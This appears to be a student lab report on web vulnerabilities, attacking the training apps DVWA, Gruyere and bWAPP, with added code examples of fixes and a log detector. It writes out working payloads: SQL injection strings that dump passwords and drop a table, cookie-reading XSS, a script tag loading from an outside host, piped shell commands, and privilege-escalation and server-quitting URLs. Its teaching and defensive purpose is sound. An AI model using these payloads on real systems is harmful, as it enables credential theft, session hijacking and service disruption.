T&H Andreea Iuga 2705400

This document discusses various techniques for secure programming and vulnerabilities in web applications. It covers SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), path traversal, and command execution vulnerabilities at different security levels. It also demonstrates how these vulnerabilities can be exploited on the Gruyere and bWAPP vulnerable web applications. Specific techniques shown include retrieving data from databases, executing commands, elevating privileges, and denial of service attacks. The document provides a guide to common web application vulnerabilities and methods for exploiting them.

Uploaded by iuga
Copyright: © All Rights Reserved

Secure

Programming

Authors:
Andreea Iuga (2705400)
Gintare Narbutaite (2521881)

19/Sept/2018
Table of contents

Part 1: SQL injection 4
Q&A 4
SQL injection: Security level: low 5
SQL injection: Security level: medium 11
Part 2: XSS, XSRF, Path Traversal (PT) 13
XSS reflected 13
XSS reflected: Security level: low 13
XSS reflected: Security level: medium 17
XSS stored 19
XSS stored: Security level: low 19
XSS stored: Security level: medium 23
CSRF 27
CSRF: Security level: low 27
CSRF: Security level: medium 28
Command execution 29
Command execution: Security level: low 29
Command execution: Security level: medium 32
Gruyere 35
Gruyere: File upload XSS 35
Gruyere: Reflected XSS 37
Gruyere: Stored XSS 38
Gruyere: Stored XSS via HTML Attribute 39
Gruyere: Stored XSS via AJAX 40
Gruyere: Elevation of Privilege 41
Gruyere: Cookie manipulation 42
Gruyere: XSSI 43
Gruyere: Path traversal (data tampering) 44
Gruyere: DoS - Quit the Server 44
EXTRA: Hacking bWAPP 45
SQL Injection 48
SQL Injection - Get/Search 48
HTML Injection 54
iFrame Injection 57
SSI Injection 58
Personal development 62
Part 1: SQL injection

Q&A
Test for SQL injection: What input is used in queries? What input is vulnerable to SQLi?
Unsanitized input, i.e. input that reaches the query without dangerous characters being stripped or escaped. SQL injection usually happens in the WHERE clause.

Can you generate errors with erroneous input and learn more about the database back-end?
Yes, it is possible. Depending on the database vendor, different commands can be used to print system information or dump valuable data if the web application is vulnerable to SQL injection.

Can you list all users in the database with SQL injection?
It is possible to list all currently existing users in the database with the help of SQL injection. Moreover, by executing another command it is even possible to see the passwords of those users.

What can you learn about the db structure with blindfolded SQLi techniques?
Blindfolded means that you do not know where the vulnerability is, so you have to try different combinations until a guess turns out to be true, and then you retrieve e.g. a username and password.

Can you list data from another table with SQL injection?
SQL injection: Security level: low

Display users in the database by inserting: %'or'0'='0

The other command, 'or'a'='a, gives the same output as the previous one.

These commands return the currently existing users within the users table.

DROP the table with: 1;DROP TABLE users
Retrieving the version of the database by inserting the command: %' or 0=0 union select null, version()#
Getting the information about the database schema with the command:
1' OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#

The result looked like this:

Retrieving the passwords of the current users, which are stored in the database, by using the following command:
1' OR 1=1 UNION SELECT user, password from users#

SQL injection: Security level: medium

1' OR 1=1 UNION SELECT user, password from users#

The output of the command was the following:

Getting the information of the database schema with the command:
1' OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#

The output was again the error message:
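As an added example (not from the report or from DVWA), the same user lookup written once with string concatenation and once with a bound parameter, against a constructed in-memory SQLite users table. The two tautology payloads from the low level above return every row through the first function and nothing through the second, which is the whole point of parameterised queries:

```python
import sqlite3

# Constructed sample data standing in for the DVWA "users" table queried above.
SAMPLE_USERS = [("admin", "pw-hash-1"), ("gordonb", "pw-hash-2"), ("pablo", "pw-hash-3")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, name):
    # The user-controlled value is spliced into the SQL text, so a quote in the
    # input closes the literal and the rest is parsed as part of the WHERE clause.
    sql = "SELECT user FROM users WHERE user LIKE '" + name + "'"
    return sorted(row[0] for row in conn.execute(sql))


def lookup_safe(conn, name):
    # Bound parameter: the value travels separately from the statement text, so
    # quotes and SQL keywords inside it are only ever compared as data.
    rows = conn.execute("SELECT user FROM users WHERE user LIKE ?", (name,))
    return sorted(row[0] for row in rows)


if __name__ == "__main__":
    db = make_db()
    for payload in ("admin", "%'or'0'='0", "'or'a'='a"):
        print(repr(payload), lookup_vulnerable(db, payload), lookup_safe(db, payload))
```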


Part 2: XSS, XSRF, Path Traversal (PT)

XSS reflected

XSS reflected: Security level: low

1. What's your name?: <script>alert("Hackers Techniques")</script>
2. What's your name?: <h1>TEST</h1>
3. What's your name?: <A HREF="//www.google.com/">XSS </A>
4. What's your name?: <h1 style="background-color:DodgerBlue;">Hello World</h1>
5. What's your name?: <img src="https://www.trafalgar.com/~/media/images/home/destinations/europe-and-britain/netherlands/2016-licensed-images/netherlands-rotterdam-2016-r-531510513.jpg?la=en&h=450&w=450&mw=450">
6. What's your name?: <script>alert(document.cookie)</script>

XSS reflected: Security level: medium

1. What's your name?: <script>alert("Hackers Techniques")</script>
2. What's your name?: <h1>TEST</h1>
3. What's your name?: <img src="https://www.trafalgar.com/~/media/images/home/destinations/europe-and-britain/netherlands/2016-licensed-images/netherlands-rotterdam-2016-r-531510513.jpg?la=en&h=450&w=450&mw=450">
4. What's your name?: <script>alert(document.cookie)</script>
XSS stored

XSS stored: Security level: low

1. Name: SeprTest
   Message: <h1>TEST</h1>
2. Name: SeprTest
   Message: <script>alert("Hacking techniques");</script>
3. Name: SeprTEST
   Message: <IFRAME SRC=javascript:alert('XSS')></IFRAME>
4. Name: SeprTEST
   Message: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>

XSS stored: Security level: medium

1. Name: SeprTest
   Message: <h1>TEST</h1>
2. Name: SeprTest
   Message: <script>alert("Hacking techniques");</script>
3. Name: SeprTEST
   Message: <IFRAME SRC=javascript:alert('XSS')></IFRAME>
4. Name: SeprTEST
   Message: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
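As an added example (not from the report or from DVWA), the rendering step behind both the reflected and the stored tests above, once with the input pasted raw into the page and once HTML-encoded for the text context, plus a small checker built on Python's html.parser that lists which elements the input managed to create and which of them can run script. The payloads are constructed copies of the ones submitted above:

```python
import html
from html.parser import HTMLParser

# Constructed copies of the payloads submitted in the reflected and stored XSS tests.
PAYLOADS = [
    '<script>alert("Hackers Techniques")</script>',
    "<IFRAME SRC=javascript:alert('XSS')></IFRAME>",
    '<a onmouseover="alert(1)" href="#">read this!</a>',
    '<h1 style="background-color:DodgerBlue;">Hello World</h1>',
]


def render_vulnerable(name):
    # What the low level does: the input lands in the page as raw markup.
    return "<p>Hello " + name + "</p>"


def render_safe(name):
    # Encode for the HTML text context: < > & " ' become entities, so the browser
    # shows the payload as text and never builds an element from it.
    return "<p>Hello " + html.escape(name, quote=True) + "</p>"


class _Tags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def injected_elements(markup):
    """Elements in the rendered page other than the template's own <p>."""
    parser = _Tags()
    parser.feed(markup)
    return [tag for tag, _ in parser.tags if tag != "p"]


def script_capable(markup):
    """Elements that can run script: script/iframe tags, on* event handlers,
    or a javascript: URL in any attribute value."""
    parser = _Tags()
    parser.feed(markup)
    found = []
    for tag, attrs in parser.tags:
        values = [(v or "").strip().lower() for v in attrs.values()]
        if (tag in ("script", "iframe") or any(k.startswith("on") for k in attrs)
                or any(v.startswith("javascript:") for v in values)):
            found.append(tag)
    return found
```

The h1 payload is not script-capable but still shows up as an injected element, which is the HTML-injection case the report revisits later on bWAPP.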
CSRF

CSRF: Security level: low

1. New password: sepr08
   Confirm new password: sepr08
2. New password: sepr08
   Confirm new password: password

CSRF: Security level: medium

1. New password: sepr08
   Confirm new password: sepr08
2. New password: sepr08
   Confirm new password: password
Command execution

Command execution: Security level: low

1. Enter an IP address below: 192.168.20.26
2. Enter an IP address below: 8.8.8.8
3. Enter an IP address below: | date
4. Enter an IP address below: | whoami
5. Enter an IP address below: | netstat
6. Enter an IP address below: | vmstat

Command execution: Security level: medium

1. Enter an IP address below: 192.168.20.26
2. Enter an IP address below: 8.8.8.8
3. Enter an IP address below: | date
4. Enter an IP address below: | whoami
5. Enter an IP address below: | netstat
6. Enter an IP address below: | vmstat
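As an added example (not from the report or from DVWA), the ping feature above written the vulnerable way, as a shell string built by concatenation, next to the fixed version, which first proves the field is an IP address with the ipaddress module and then hands an argv list to subprocess without any shell. The six inputs are constructed copies of the ones entered above:

```python
import ipaddress
import subprocess

# Constructed inputs: the two addresses and the four piped commands entered above.
INPUTS = ["192.168.20.26", "8.8.8.8", "| date", "| whoami", "| netstat", "| vmstat"]


def build_ping_vulnerable(target):
    # The pattern behind the page: the field is pasted into a shell command line,
    # so '|' turns the rest of the input into a second command for /bin/sh.
    # Returned as a string rather than executed so it can be inspected.
    return "ping -c 1 " + target


def validate_ip(target):
    # Allow-list validation: parse as an IPv4/IPv6 address or reject outright.
    # This is the fix; stripping individual shell characters is not.
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        return None


def build_ping_safe(target):
    # argv list handed to execve directly: no shell ever parses it, and the
    # value has already been proven to be nothing but an address.
    ip = validate_ip(target)
    if ip is None:
        return None
    return ["ping", "-c", "1", ip]


def run_ping(target):
    argv = build_ping_safe(target)
    if argv is None:
        return "rejected: not an IP address"
    done = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return done.stdout + done.stderr


if __name__ == "__main__":
    for value in INPUTS:
        print(repr(value), "->", build_ping_safe(value))
```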
Gruyere
Step 1: create a fake account
Username: andreea
Password: password

Gruyere: File upload XSS

1. In order to start the XSS attack, we'll upload an HTML file to Gruyere.
We can access the file at the above mentioned link, which brings us to the following page:

After pressing the 'ok' button, we'll be redirected to the intended page:

2. In order to start the XSS attack, we'll upload an HTML file to Gruyere.
We can access the file at the above mentioned link, which brings us to the following page:

After pressing the 'ok' button, we'll be redirected to the intended page:

Gruyere: Reflected XSS

Create a URL: https://google-gruyere.appspot.com/518663309805883930959424785217645150920/<script>alert(document.cookie)</script>

Therefore, the attack was successful.

Gruyere: Stored XSS
Insert "<a onmouseover="alert(1)" href="#">read this!</a>" in the HTML file:

Gruyere: Stored XSS via HTML Attribute

When the user hovers the mouse over the title, he/she gets the following message:

Gruyere: Stored XSS via AJAX
Fake account: ginte, password

After submitting the entered text, we should expect some changes on the client side, which, to be more specific, insert the snippet into the document. However, what we see is:

Instead of JSON.

Gruyere: Elevation of Privilege

Converting a simple account into an administrator by issuing the following request:

https://google-gruyere.appspot.com/432592005498204268630965285797940329505/saveprofile?action=update&is_admin=True

Gruyere: Cookie manipulation
When creating a new account with the username admin, Gruyere issues a cookie from someone else's account.

Bypassing the restriction of having only sixteen characters in the user name by issuing the following request:
https://google-gruyere.appspot.com/432592005498204268630965285797940329505/saveprofile?action=new&uid=administrator|admin|author&pw=secret
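As an added example (not Gruyere's own code), a session cookie and saveprofile handler hardened against the two manipulations above. The cookie body "uid|admin|author" is covered by an HMAC under a server-side secret (a constructed value here), usernames containing the field separator or longer than sixteen characters are rejected before any cookie is issued, and is_admin is simply not one of the fields a request may write:

```python
import hashlib
import hmac

# Assumptions (constructed for this example): a server-side secret and a
# three-field session body "uid|admin|author" like the cookie tampered with above.
SECRET = b"constructed-demo-key-change-me"
SEP = "|"
EDITABLE_FIELDS = {"name", "pw"}  # is_admin is deliberately not client-editable


def valid_username(uid):
    # Enforced server-side, not only in the HTML form: at most sixteen printable
    # characters and never the separator the cookie format relies on.
    return 0 < len(uid) <= 16 and SEP not in uid and uid.isprintable()


def _tag(body):
    return hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()


def issue_cookie(uid, is_admin=False, is_author=False):
    # Returns the cookie string, or None if the username is not acceptable.
    if not valid_username(uid):
        return None
    body = SEP.join([uid, "admin" if is_admin else "", "author" if is_author else ""])
    return _tag(body) + SEP + body


def parse_cookie(cookie):
    # Returns the session dict, or None if the body was altered or is malformed.
    tag, _, body = cookie.partition(SEP)
    if not hmac.compare_digest(tag, _tag(body)):
        return None
    fields = body.split(SEP)
    if len(fields) != 3 or not valid_username(fields[0]):
        return None
    return {"uid": fields[0], "admin": fields[1] == "admin", "author": fields[2] == "author"}


def update_profile(cookie, params, profiles):
    # The saveprofile handler: identity and rights come from the verified cookie,
    # never from request parameters, and only allow-listed fields are written.
    session = parse_cookie(cookie)
    if session is None:
        return False
    target = profiles.setdefault(session["uid"], {})
    for key, value in params.items():
        if key in EDITABLE_FIELDS:
            target[key] = value
    return True
```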
Gruyere: XSSI

Reading someone else's private snippet by executing the feed.gtl script. When the script is being executed, the _feed function can do whatever it wants with the data, including sending it to another website.

Gruyere: Path traversal (data tampering)

Creating a text file called secret.txt

Uploading the file onto the Gruyere server. This way the Gruyere file called secret.txt will be replaced by the one I have just uploaded.

Gruyere: DoS - Quit the Server

In order to quit the server, you should be logged in as administrator. However, by issuing a request to:
https://google-gruyere.appspot.com/432592005498204268630965285797940329505/quitserver
we can do it while logged in as a simple user.
EXTRA: Hacking bWAPP
bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.

bWAPP helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful penetration testing and ethical hacking projects. What makes bWAPP so unique? Well, it has over 100 web bugs! It covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project. The focus is not just on one specific issue... bWAPP is covering a wide range of vulnerabilities!

bWAPP is a PHP application that uses a MySQL database. It can be hosted on Linux/Windows with Apache/IIS and MySQL. It is supported on WAMP or XAMPP. Another possibility is to download bee-box, a custom VM pre-installed with bWAPP.
SQL Injection

SQL Injection - Get/Search

1. Now, we'll try to search for "Iron Man".
2. Command used: title=1' order by 1-- -
3. Command used: title=1' order by 5-- -
4. Command used: title=1' order by 7-- -
   The result of this command is that the column is outside the table.
5. Command: title=1' union select 1,2,3,4,5,6-- -
6. Command: title=1' union select 1,2,3,4,database(),6-- -
7. Command: title=1' union select 1,2,3,4,version(),6-- -
8. Command: title=1' union select 1,2,3,4,table_name(),6 from information_schema.tables -- -
9. Command: title=1' union select 1,2,3,4,table_name,6 from information_schema.tables where table_schema=database-- -
10. Command: title=1' union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database-- -
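As an added example (constructed here, not part of the report or of bWAPP), a small detector for the probing sequence above, run over three constructed Apache-style access-log lines that carry the search requests from steps 1, 4 and 10 URL-encoded the way a browser sends the form. It decodes each query parameter once and flags the ORDER BY column probe, the UNION SELECT, the schema and version enumeration functions, and the comment terminator; the path /bWAPP/sqli_1.php and the title parameter are assumptions about the installation:

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (Apache combined format) for steps 1, 4 and 10 above.
LOG_LINES = [
    '10.0.0.5 - - [19/Sep/2018:10:01:02 +0200] "GET /bWAPP/sqli_1.php?title=Iron+Man&action=search HTTP/1.1" 200 5120',
    '10.0.0.5 - - [19/Sep/2018:10:01:40 +0200] "GET /bWAPP/sqli_1.php?title=1%27+order+by+7--+-&action=search HTTP/1.1" 200 4110',
    '10.0.0.5 - - [19/Sep/2018:10:02:15 +0200] "GET /bWAPP/sqli_1.php?title=1%27+union+select+1,2,3,4,group_concat(table_name),6+from+information_schema.tables+where+table_schema=database()--+-&action=search HTTP/1.1" 200 6230',
]

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each signature names one step of the technique walked through above.
SIGNATURES = [
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+")),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b")),
    ("schema-enum", re.compile(r"\binformation_schema\b|\bdatabase\(\)|\bversion\(\)")),
    ("comment-terminator", re.compile(r"--\s|#|/\*")),
]


def scan_line(line):
    """Return (ip, path, sorted signature names) for one request line, or None
    if the line is not a request. Parameter values are decoded once by parse_qsl
    and whitespace-normalised before matching."""
    m = REQUEST_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m["target"])
    hits = set()
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        norm = re.sub(r"\s+", " ", value).lower()
        for name, pattern in SIGNATURES:
            if pattern.search(norm):
                hits.add(name)
    return m["ip"], parts.path, sorted(hits)


def scan_log(lines):
    # Only the requests that tripped at least one signature.
    return [r for r in map(scan_line, lines) if r and r[2]]
```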
HTML Injection

Description
HTML Injection - Reflected GET
First name: <h1>HTML</h1>
Last name: <h1> injection </h1>
HTML Injection - Reflected POST
First name: <h1>HTML</h1>
Last name: <h1> post</h1>

iFrame Injection

By changing the width to 50 and the height to 50, we'll get the following result:

SSI Injection

Description
Command:
First name: Test
Last name: Test2

Result:
Command:
First name: <script> alert("xss")</script>
Last name: Test1

Result:
Command:
First name: <!--#echo var="DOCUMENT_NAME"-->
Last name: Test3

Result:
Personal development
By doing the research and applying it, we have gained new skills and enlarged our knowledge about hacking techniques and how they can be applied to vulnerable websites and web services. In addition, we got some information about possible ways of preventing those techniques.
The knowledge we obtained covers a lot of different hacking possibilities. During the second part of the Secure Programming course, we hope to be able to successfully apply this knowledge when practicing website hacking.
